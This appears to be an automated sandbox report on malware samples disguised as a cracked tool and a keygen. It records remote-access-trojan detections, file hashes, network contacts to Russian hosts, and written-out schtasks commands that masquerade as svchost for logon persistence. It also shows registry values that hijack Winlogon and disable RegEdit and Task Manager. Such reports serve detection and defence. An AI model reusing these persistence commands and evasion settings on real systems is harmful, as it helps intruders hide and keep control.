PID 5568 wrote to memory of 5108 N/A C:\Windows\SysWOW64\cmd.exe C:\intofont\wincommon.exe
PID 5568 wrote to memory of 5108 N/A C:\Windows\SysWOW64\cmd.exe C:\intofont\wincommon.exe
PID 5108 wrote to memory of 4476 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 4476 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 2832 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 2832 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 4524 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 4524 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 4776 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 4776 N/A C:\intofont\wincommon.exe C:\Windows\SYSTEM32\schtasks.exe
PID 5108 wrote to memory of 744 N/A C:\intofont\wincommon.exe C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe
PID 5108 wrote to memory of 744 N/A C:\intofont\wincommon.exe C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe

"C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\intofont\1Udi0TDz635jTrMWFNrE4kqnOIuYIi.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\intofont\msg.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\intofont\xLg6v1j1ZJy5DZ1pz826KfZq2BmfLM.bat" "

C:\intofont\wincommon.exe

"C:\intofont\wincommon.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Documents and Settings\svchost.exe'" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\ProgramData\Microsoft OneDrive\svchost.exe'" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Users\Default\SendTo\svchost.exe'" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe'" /rl HIGHEST /f

C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe

"C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 cb76972.tmweb.ru udp
RU 5.23.51.23:80 cb76972.tmweb.ru tcp
US 8.8.8.8:53 vh346.timeweb.ru udp
RU 5.23.51.23:443 vh346.timeweb.ru tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

C:\intofont\1Udi0TDz635jTrMWFNrE4kqnOIuYIi.vbe

MD5 35f693ab095c33d4c62230d69ff6b43f
SHA1 19e8b126076b5e5d8e8b97f3757ad99357915bf4
SHA256 1a3b550ae14c360fd9600e52924706a356290939317f3a32b35bfa97b5dbc163
SHA512 1e2599c7b10a1fc5c004d7d68c487028d5d2d6a1102af0150ea0c15663819dac42e3a55a769cc532cf45f9f037cece3fcdc2820f2bfbe8439fd0a3d5a16bb4df

C:\intofont\msg.vbs

MD5 01c71ea2d98437129936261c48403132
SHA1 dc689fb68a3e7e09a334e7a37c0d10d0641af1a6
SHA256 0401f2dd76d5ed6f90c82b72e1e7a122ef127bedbaf717532c4bba26d43a0061
SHA512 a668d4216a50ccc699221dd902d8b0f864e44368dc7474fa5659a739154d4e769b85d49b60a73affb8fba7628e7210b0f8106d5652006d1bbba67083513e65d9

C:\intofont\MOS

MD5 cb456215c3333db0551bd0788bc258c7
SHA1 a0b861f6121344b631992c8252fa8748835e4df6
SHA256 7e7b3a01539b5dd82108fe0dc455a76294708bb782f8f7590b06f0975fdf93c1
SHA512 796ccc0f1fc4a990fe3c50f54a2d009e6ddb8e4e062ac1839a2c2c1e6f120311dad66fa86211137cb38cce27a99614085702d5fe9b6f3effc5dd1db0ad879448

C:\intofont\xLg6v1j1ZJy5DZ1pz826KfZq2BmfLM.bat

MD5 9fe442702fb57ffec2b831c3949a74e0
SHA1 e285d89241ef0aeeeb50f65e09a741baf399cb1f
SHA256 d50176a5de27bc9b4c52ebb4e30ec4cbf1e6a79eda4d83a013b220f489a5bcb9
SHA512 548a8df7f0d9278f84eca35bf40638a4572cb625050f7a0684ee14b2117df8307101d8f9383c3fcab23fcf656c21f69db3f4509a037307ed6658ff4c063b4eab

C:\intofont\wincommon.exe

MD5 9134637118b2a4485fb46d439133749b
SHA1 25b60dba36e432f53f68603797d50b9c6cc127ce
SHA256 5dca1a463f5308018c477503a5179f45c468245dd4a84732ee824bd704521acc
SHA512 a6db12e3349c034051940b15adbb530ba34152ccbe41afc210dad7e64331221b3dbae1563a2f3b79a43d12da54eaeac3f30cfb708ebc75ab6a9dfc30a8f1e601

Analysis: behavioral17

Detonation Overview

Submitted 2025-05-04 05:10
Reported 2025-05-04 05:15
Platform win10v2004-20250502-en
Max time kernel 102s
Max time network 130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe

"C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted 2025-05-04 05:10
Reported 2025-05-04 05:15
Platform win10v2004-20250502-en
Max time kernel 150s
Max time network 115s

Command Line

"C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Babylon RAT

trojan babylonrat

Babylonrat family

babylonrat

Darkcomet

trojan rat darkcomet

Darkcomet family

darkcomet

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\k4Xq51JTS0f2R98Z\\Vt623we1OUKI.exe\",explorer.exe" C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\Documents\\excelsl.exe" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Roaming\\k4Xq51JTS0f2R98Z\\ZtpSdXGAdAWv.exe\",explorer.exe" C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A

Njrat family

njrat

WarzoneRat, AveMaria

rat infostealer warzonerat

Warzonerat family

warzonerat

njRAT/Bladabindi

trojan njrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Warzone RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables RegEdit via registry modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Disables Task Manager via registry modification

defense_evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d790bed038373d95093d4db590b9997.exe C:\Windows\svehosts.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d790bed038373d95093d4db590b9997.exe C:\Windows\svehosts.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Windows\svehosts.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
N/A N/A C:\Windows\svehosts.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\prndrvest.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\office = "C:\\Users\\Admin\\Documents\\excelsl.exe" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\office = "C:\\Users\\Admin\\Documents\\excelsl.exe" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2d790bed038373d95093d4db590b9997 = "\"C:\\Windows\\svehosts.exe\" .." C:\Windows\svehosts.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\2d790bed038373d95093d4db590b9997 = "\"C:\\Windows\\svehosts.exe\" .." C:\Windows\svehosts.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\svehosts.exe C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\notepad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\excelsl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\notepad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\prndrvest.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svehosts.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\excelsl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svehosts.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\prndrvest.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 33 (LUID 33 = SeIncreaseWorkingSetPrivilege; LUID not resolved to a name by the sandbox) N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 34 (LUID 34 = SeTimeZonePrivilege) N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 35 (LUID 35 = SeCreateSymbolicLinkPrivilege) N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 36 (LUID 36 = SeDelegateSessionUserImpersonatePrivilege) N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\svehosts.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\svehosts.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Documents\excelsl.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Documents\excelsl.exe N/A
